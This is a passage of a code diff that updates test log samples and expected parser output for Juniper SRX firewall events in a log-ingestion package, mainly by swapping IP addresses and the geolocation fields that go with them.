roles=\"N/A\" session-id-32=\"572564\" source-zone-name=\"Outside\" destination-zone-name=\"DMZ\"]", + "ingested": "2021-12-10T10:14:13.629278700Z", + "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category=\"secintel\" sub-category=\"Blacklist\" action=\"BLOCK\" action-detail=\"DROP\" http-host=\"N/A\" threat-severity=\"0\" source-address=\"67.43.156.15\" source-port=\"1\" destination-address=\"10.10.0.10\" destination-port=\"24039\" protocol-id=\"1\" application=\"N/A\" nested-application=\"N/A\" feed-name=\"Tor_Exit_Nodes\" policy-name=\"cc_policy\" profile-name=\"Blacklist\" username=\"N/A\" roles=\"N/A\" session-id-32=\"572564\" source-zone-name=\"Outside\" destination-zone-name=\"DMZ\"]", "kind": "alert", "action": "malware_detected", "category": [ @@ -113,48 +96,30 @@ { "server": { "port": 80, - "ip": "216.160.83.61" + "ip": "10.0.0.1" }, "log": { "level": "informational" }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 80, - "ip": "216.160.83.61" + "ip": "10.0.0.1" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 36612, - "ip": "216.160.83.61" + "ip": "67.43.156.15" }, "juniper": { "srx": { @@ -203,17 +168,18 @@ "dummy_host" ], "ip": [ - "216.160.83.61" + "67.43.156.15", + "10.0.0.1" ] }, "client": { "port": 36612, - "ip": "216.160.83.61" + "ip": "67.43.156.15" }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:34.661598403Z", - "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category=\"secintel\" sub-category=\"CC\" action=\"BLOCK\" action-detail=\"CLOSE REDIRECT MSG\" http-host=\"dummy_host\" threat-severity=\"10\" source-address=\"216.160.83.61\" source-port=\"36612\" destination-address=\"216.160.83.61\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" feed-name=\"cc_url_data\" policy-name=\"test\" profile-name=\"test-profile\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502362\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" occur-count=\"0\"]", + "ingested": "2021-12-10T10:14:13.629290600Z", + "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category=\"secintel\" sub-category=\"CC\" action=\"BLOCK\" action-detail=\"CLOSE REDIRECT MSG\" http-host=\"dummy_host\" threat-severity=\"10\" source-address=\"67.43.156.15\" source-port=\"36612\" destination-address=\"10.0.0.1\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" feed-name=\"cc_url_data\" policy-name=\"test\" profile-name=\"test-profile\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502362\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" occur-count=\"0\"]", "kind": "alert", "action": "malware_detected", "category": [ diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log index edc8adbeedc..89a7b563c02 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log @@ -1,12 +1,12 @@ -<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.86 source-address="192.168.1.100" source-port="58071" destination-address="216.160.83.61" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"] -<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.86 source-address="10.10.10.50" source-port="1402" destination-address="216.200.241.66" destination-port="80" category="N/A" reason="BY_OTHER" profile="wf-profile" url="www.checkpoint.com" obj="/css/homepage2012.css" username="user02" roles="N/A"] -<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@2636.1.1.1.2.40 source-address="216.160.83.61" source-port="80" destination-address="216.160.83.61" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"] -<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@2636.1.1.1.2.40 source-address="216.160.83.61" source-port="80" destination-address="216.160.83.61" destination-port="33578" filename="www.google.com/" error-code="14" error-message="scan engine is not ready"] -<12>1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@2636.1.1.1.2.40 source-address="10.2.1.101" source-port="80" destination-address="216.160.83.61" destination-port="51727" filename="10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz"] -<14>1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@2636.1.1.1.2.86 source-zone="trust" destination-zone="untrust" source-name="N/A" source-address="216.160.83.61" profile-name="antispam01" action="drop" reason="Match local blacklist" username="user01" roles="N/A"] -<14>1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@2636.1.1.1.2.86 source-zone="untrust" destination-zone="trust" protocol="http" source-address="216.160.83.61" source-port="58071" destination-address="198.51.100.2" destination-port="80" profile-name="content02" action="drop" reason="blocked due to file extension block list" username="user01@testuser.com" roles="N/A" filename="test.cmd"] -<12>1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@2636.1.1.1.2.86 source-address="192.168.1.100" source-port="58071" destination-address="216.160.83.61" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"] -<12>1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@2636.1.1.1.2.40 source-address="216.160.83.61" source-port="80" destination-address="216.160.83.61" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"] -<14>1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.129 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="58974" destination-address="216.160.83.61" destination-port="443" session-id="16297" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Information_Technology" reason="BY_SITE_REPUTATION_MODERATELY_SAFE" profile="WCF1" url="datawrapper.dwcdn.net" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="0"] -<12>1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.129 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="59075" destination-address="216.160.83.61" destination-port="443" session-id="16490" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Advertisements" reason="BY_SITE_REPUTATION_SUSPICIOUS" profile="WCF1" url="dsp.adfarm1.adition.com" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="3"] -<12>1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@2636.1.1.1.2.129 source-zone="trust" destination-zone="untrust" source-address="23.209.86.45" source-port="80" destination-address="216.160.83.61" destination-port="58954" profile-name="Custom-Sophos-Profile" filename="download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar" action="BLOCKED" reason="exceeding maximum content size" error-code="7" username="N/A" roles="N/A"] +<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-address="192.168.1.100" source-port="58071" destination-address="67.43.156.13" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"] +<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-address="10.10.10.50" source-port="1402" destination-address="67.43.156.13" destination-port="80" category="N/A" reason="BY_OTHER" profile="wf-profile" url="www.checkpoint.com" obj="/css/homepage2012.css" username="user02" roles="N/A"] +<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@67.43.156.15 source-address="67.43.156.13" source-port="80" destination-address="10.1.1.103" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"] +<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@67.43.156.15 source-address="67.43.156.14" source-port="80" destination-address="10.1.1.103" destination-port="33578" filename="www.google.com/" error-code="14" error-message="scan engine is not ready"] +<12>1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@67.43.156.15 source-address="10.2.1.101" source-port="80" destination-address="10.1.1.103" destination-port="51727" filename="10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz"] +<14>1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@67.43.156.15 source-zone="trust" destination-zone="untrust" source-name="N/A" source-address="10.10.10.1" profile-name="antispam01" action="drop" reason="Match local blacklist" username="user01" roles="N/A"] +<14>1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@67.43.156.15 source-zone="untrust" destination-zone="trust" protocol="http" source-address="192.168.2.3" source-port="58071" destination-address="192.168.100.2" destination-port="80" profile-name="content02" action="drop" reason="blocked due to file extension block list" username="user01@testuser.com" roles="N/A" filename="test.cmd"] +<12>1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@67.43.156.15 source-address="192.168.1.100" source-port="58071" destination-address="67.43.156.13" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"] +<12>1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@67.43.156.15 source-address="67.43.156.13" source-port="80" destination-address="10.1.1.103" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"] +<14>1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="58974" destination-address="67.43.156.14" destination-port="443" session-id="16297" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Information_Technology" reason="BY_SITE_REPUTATION_MODERATELY_SAFE" profile="WCF1" url="datawrapper.dwcdn.net" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="0"] +<12>1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="59075" destination-address="67.43.156.13" destination-port="443" session-id="16490" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Advertisements" reason="BY_SITE_REPUTATION_SUSPICIOUS" profile="WCF1" url="dsp.adfarm1.adition.com" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="3"] +<12>1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@67.43.156.15 source-zone="trust" destination-zone="untrust" source-address="67.43.156.13" source-port="80" destination-address="10.1.1.100" destination-port="58954" profile-name="Custom-Sophos-Profile" filename="download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar" action="BLOCKED" reason="exceeding maximum content size" error-code="7" username="N/A" roles="N/A"] diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log-expected.json index 339ab20ebad..5f7fe473bb2 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log-expected.json @@ -3,29 +3,26 @@ { "server": { "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "log": { "level": "warning" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "source": { "port": 58071, @@ -69,7 +66,7 @@ ], "ip": [ "192.168.1.100", - "216.160.83.61" + "67.43.156.13" ] }, "client": { @@ -78,8 +75,8 @@ }, "event": { "severity": 12, - "ingested": "2021-12-06T12:25:35.371156617Z", - "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.86 source-address=\"192.168.1.100\" source-port=\"58071\" destination-address=\"216.160.83.61\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:14:14.639402800Z", + "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-address=\"192.168.1.100\" source-port=\"58071\" destination-address=\"67.43.156.13\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", "kind": "alert", "action": "web_filter", "category": [ @@ -97,14 +94,26 @@ { "server": { "port": 80, - "ip": "216.200.241.66" + "ip": "67.43.156.13" }, "log": { "level": "warning" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 80, - "ip": "216.200.241.66" + "ip": "67.43.156.13" }, "source": { "port": 1402, @@ -147,7 +156,7 @@ ], "ip": [ "10.10.10.50", - "216.200.241.66" + "67.43.156.13" ] }, "client": { @@ -156,8 +165,8 @@ }, "event": { "severity": 12, - "ingested": "2021-12-06T12:25:35.371162518Z", - "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.86 source-address=\"10.10.10.50\" source-port=\"1402\" destination-address=\"216.200.241.66\" destination-port=\"80\" category=\"N/A\" reason=\"BY_OTHER\" profile=\"wf-profile\" url=\"www.checkpoint.com\" obj=\"/css/homepage2012.css\" username=\"user02\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:14:14.639411600Z", + "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-address=\"10.10.10.50\" source-port=\"1402\" destination-address=\"67.43.156.13\" destination-port=\"80\" category=\"N/A\" reason=\"BY_OTHER\" profile=\"wf-profile\" url=\"www.checkpoint.com\" obj=\"/css/homepage2012.css\" username=\"user02\" roles=\"N/A\"]", "kind": "event", "category": [ "network" @@ -172,48 +181,30 @@ { "server": { "port": 47095, - "ip": "216.160.83.61" + "ip": "10.1.1.103" }, "log": { "level": "warning" }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 47095, - "ip": "216.160.83.61" + "ip": "10.1.1.103" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "juniper": { "srx": { @@ -250,17 +241,18 @@ "EICAR-Test-File" ], "ip": [ - "216.160.83.61" + "67.43.156.13", + "10.1.1.103" ] }, "client": { "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "event": { "severity": 12, - "ingested": "2021-12-06T12:25:35.371164532Z", - "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@2636.1.1.1.2.40 source-address=\"216.160.83.61\" source-port=\"80\" destination-address=\"216.160.83.61\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", + "ingested": "2021-12-10T10:14:14.639416300Z", + "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@67.43.156.15 source-address=\"67.43.156.13\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", "kind": "alert", "action": "virus_detected", "category": [ @@ -278,48 +270,30 @@ { "server": { "port": 33578, - "ip": "216.160.83.61" + "ip": "10.1.1.103" }, "log": { "level": "warning" }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 33578, - "ip": "216.160.83.61" + "ip": "10.1.1.103" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -347,17 +321,18 @@ }, "related": { "ip": [ - "216.160.83.61" + "67.43.156.14", + "10.1.1.103" ] }, "client": { "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.14" }, "event": { "severity": 12, - "ingested": "2021-12-06T12:25:35.371189148Z", - "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@2636.1.1.1.2.40 source-address=\"216.160.83.61\" source-port=\"80\" destination-address=\"216.160.83.61\" destination-port=\"33578\" filename=\"www.google.com/\" error-code=\"14\" error-message=\"scan engine is not ready\"]", + "ingested": "2021-12-10T10:14:14.639420Z", + "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"33578\" filename=\"www.google.com/\" error-code=\"14\" error-message=\"scan engine is not ready\"]", "kind": "event", "category": [ "network" @@ -372,29 +347,14 @@ { "server": { "port": 51727, - "ip": "216.160.83.61" + "ip": "10.1.1.103" }, "log": { "level": "warning" }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 51727, - "ip": "216.160.83.61" + "ip": "10.1.1.103" }, "source": { "port": 80, @@ -425,7 +385,7 @@ "related": { "ip": [ "10.2.1.101", - "216.160.83.61" + "10.1.1.103" ] }, "client": { @@ -434,8 +394,8 @@ }, "event": { "severity": 12, - "ingested": "2021-12-06T12:25:35.371193667Z", - "original": "\u003c12\u003e1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@2636.1.1.1.2.40 source-address=\"10.2.1.101\" source-port=\"80\" destination-address=\"216.160.83.61\" destination-port=\"51727\" filename=\"10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz\"]", + "ingested": "2021-12-10T10:14:14.639424500Z", + "original": "\u003c12\u003e1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@67.43.156.15 source-address=\"10.2.1.101\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"51727\" filename=\"10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz\"]", "kind": "event", "category": [ "network" @@ -469,35 +429,20 @@ "user01" ], "ip": [ - "216.160.83.61" + "10.10.10.1" ] }, "log": { "level": "informational" }, "client": { - "ip": "216.160.83.61" + "ip": "10.10.10.1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "user": { "name": "user01" }, - "ip": "216.160.83.61" + "ip": "10.10.10.1" }, "juniper": { "srx": { @@ -510,8 +455,8 @@ }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:35.371205960Z", - "original": "\u003c14\u003e1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@2636.1.1.1.2.86 source-zone=\"trust\" destination-zone=\"untrust\" source-name=\"N/A\" source-address=\"216.160.83.61\" profile-name=\"antispam01\" action=\"drop\" reason=\"Match local blacklist\" username=\"user01\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:14:14.639523300Z", + "original": "\u003c14\u003e1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-name=\"N/A\" source-address=\"10.10.10.1\" profile-name=\"antispam01\" action=\"drop\" reason=\"Match local blacklist\" username=\"user01\" roles=\"N/A\"]", "kind": "alert", "action": "antispam_filter", "category": [ @@ -532,36 +477,21 @@ { "server": { "port": 80, - "ip": "198.51.100.2" + "ip": "192.168.100.2" }, "log": { "level": "informational" }, "destination": { "port": 80, - "ip": "198.51.100.2" + "ip": "192.168.100.2" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 58071, "user": { "name": "user01@testuser.com" }, - "ip": "216.160.83.61" + "ip": "192.168.2.3" }, "juniper": { "srx": { @@ -602,18 +532,18 @@ "user01@testuser.com" ], "ip": [ - "216.160.83.61", - "198.51.100.2" + "192.168.2.3", + "192.168.100.2" ] }, "client": { "port": 58071, - "ip": "216.160.83.61" + "ip": "192.168.2.3" }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:35.371216319Z", - "original": "\u003c14\u003e1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@2636.1.1.1.2.86 source-zone=\"untrust\" destination-zone=\"trust\" protocol=\"http\" source-address=\"216.160.83.61\" source-port=\"58071\" destination-address=\"198.51.100.2\" destination-port=\"80\" profile-name=\"content02\" action=\"drop\" reason=\"blocked due to file extension block list\" username=\"user01@testuser.com\" roles=\"N/A\" filename=\"test.cmd\"]", + "ingested": "2021-12-10T10:14:14.639531800Z", + "original": "\u003c14\u003e1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@67.43.156.15 source-zone=\"untrust\" destination-zone=\"trust\" protocol=\"http\" source-address=\"192.168.2.3\" source-port=\"58071\" destination-address=\"192.168.100.2\" destination-port=\"80\" profile-name=\"content02\" action=\"drop\" reason=\"blocked due to file extension block list\" username=\"user01@testuser.com\" roles=\"N/A\" filename=\"test.cmd\"]", "kind": "alert", "action": "content_filter", "category": [ @@ -631,29 +561,26 @@ { "server": { "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "log": { "level": "warning" }, "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "source": { "port": 58071, @@ -697,7 +624,7 @@ ], "ip": [ "192.168.1.100", - "216.160.83.61" + "67.43.156.13" ] }, "client": { @@ -706,8 +633,8 @@ }, "event": { "severity": 12, - "ingested": "2021-12-06T12:25:35.371219626Z", - "original": "\u003c12\u003e1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@2636.1.1.1.2.86 source-address=\"192.168.1.100\" source-port=\"58071\" destination-address=\"216.160.83.61\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", + "ingested": "2021-12-10T10:14:14.639537600Z", + "original": "\u003c12\u003e1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@67.43.156.15 source-address=\"192.168.1.100\" source-port=\"58071\" destination-address=\"67.43.156.13\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", "kind": "alert", "action": "web_filter", "category": [ @@ -725,48 +652,30 @@ { "server": { "port": 47095, - "ip": "216.160.83.61" + "ip": "10.1.1.103" }, "log": { "level": "warning" }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 47095, - "ip": "216.160.83.61" + "ip": "10.1.1.103" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "juniper": { "srx": { @@ -803,17 +712,18 @@ "EICAR-Test-File" ], "ip": [ - "216.160.83.61" + "67.43.156.13", + "10.1.1.103" ] }, "client": { "port": 80, - "ip": "216.160.83.61" + "ip": "67.43.156.13" }, "event": { "severity": 12, - "ingested": "2021-12-06T12:25:35.371221649Z", - "original": "\u003c12\u003e1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@2636.1.1.1.2.40 source-address=\"216.160.83.61\" source-port=\"80\" destination-address=\"216.160.83.61\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", + "ingested": "2021-12-10T10:14:14.639541900Z", + "original": "\u003c12\u003e1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@67.43.156.15 source-address=\"67.43.156.13\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" 